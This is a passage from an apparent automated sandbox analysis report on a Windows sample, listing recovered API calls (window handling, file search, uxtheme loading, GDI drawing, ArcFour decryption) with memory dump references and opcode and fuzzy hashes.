                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 1177325624-0
                                                          • Opcode ID: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                          • Instruction ID: 3f40d390e8a5df174f84cdc2f44e01f6cfa8788c97922530efddc0b1fccee370
                                                          • Opcode Fuzzy Hash: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                          • Instruction Fuzzy Hash: 31F0CDB23A17207AF520717A5C86F6B018CC789B68F10823BBB04FF1C1E9A85D0545AD
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00482F36
                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$IconicLong
                                                          • String ID:
                                                          • API String ID: 2754861897-0
                                                          • Opcode ID: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                          • Instruction ID: 41c7b109e84caadfbd7bdb59434551f42a7ac603c048c530ac1057f10a9e5501
                                                          • Opcode Fuzzy Hash: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                          • Instruction Fuzzy Hash: F30152742452009FD600F7A58E89B6B33E55B14304F480977BB009F2E6CAADD841E71C
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                          • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                          • Instruction ID: 35f3f22b183c5d1ecd4ea1753066c09f008546f1eb4ef8afe9bdb694ca888e99
                                                          • Opcode Fuzzy Hash: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                          • Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 004241DC
                                                          • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                            • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,022125AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                          • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveFocusIconicShow
                                                          • String ID:
                                                          • API String ID: 649377781-0
                                                          • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                          • Instruction ID: 7ea1460413e76a83717bea1d3364086182948ca7ce33fd4e030d283203b7bb74
                                                          • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                          • Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00417D07
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$Placement$Iconic
                                                          • String ID:
                                                          • API String ID: 568898626-0
                                                          • Opcode ID: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                          • Instruction ID: 3daf342c44424aa5ce1366acdd2a80e82e5cfeaf10da0033b5167ac39e8fb95c
                                                          • Opcode Fuzzy Hash: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                          • Instruction Fuzzy Hash: BE017C31204108ABDB10EE69ECC1EE773A8AF59324F154166FE09CF242D638EC8087A8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CaptureIconic
                                                          • String ID:
                                                          • API String ID: 2277910766-0
                                                          • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                          • Instruction ID: 3321041a09622c131d5de1c426c5b9ba37bf97161ea704a377034d17a7c99502
                                                          • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                          • Instruction Fuzzy Hash: 2EF0AF7230564157D7209B2EC984ABB62F69F88318B54483FE419CBB61EB78DCC08658
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00424193
                                                            • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                            • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                            • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                            • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                          • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                          • String ID:
                                                          • API String ID: 2671590913-0
                                                          • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                          • Instruction ID: 714e4cd20337d44954868cb88e5cd3c5f05620b237e6b6751f152470bbecd415
                                                          • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                          • Instruction Fuzzy Hash: 47E01AA070011087EB10AF69DCC9B9632A8BB4C304F5501BABD49CF25BD63CC8608728
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127CD), ref: 004127BB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                          • Instruction ID: 515a926e27beec0aab385df702329c93692b8444378934293cf55fba5e442f36
                                                          • Opcode Fuzzy Hash: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                          • Instruction Fuzzy Hash: 4951F335304205CFD714DB6ADA8099BF3E5EF94314B2481ABD815C33A1D7B8ADA2CB48
                                                          APIs
                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004786A2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: NtdllProc_Window
                                                          • String ID:
                                                          • API String ID: 4255912815-0
                                                          • Opcode ID: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                          • Instruction ID: b7c0c70f2a783e09ad8744fe0b8a2eb923ce1fb3c3bfc7260a93e3bfca3db08f
                                                          • Opcode Fuzzy Hash: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                          • Instruction Fuzzy Hash: 1C416875604104EFCB10CF99C6888AAB7F5FB48311B24C99AE80CEB701DB38EE41DB95
                                                          APIs
                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D067
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CryptFour
                                                          • String ID:
                                                          • API String ID: 2153018856-0
                                                          • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                          • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                          • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                          • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                          APIs
                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D934,?,0046DB15), ref: 0045D07A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CryptFour
                                                          • String ID:
                                                          • API String ID: 2153018856-0
                                                          • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                          • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                          • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                          • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2975560260.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.2975508515.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2975590749.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_10000000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2975560260.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.2975508515.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2975590749.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_10000000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                            • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadVersion
                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                          • API String ID: 1968650500-2910565190
                                                          • Opcode ID: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                          • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                          • Opcode Fuzzy Hash: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                          • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,0041A93C,?), ref: 0041CA38
                                                          • 73A24C40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                          • 73A26180.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                          • 73A24C00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                          • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                          • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                          • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                          • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                          • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                          • 73A24C40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                          • 73A18830.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                          • 73A122A0.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                          • 73A24D40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                          • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                          • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
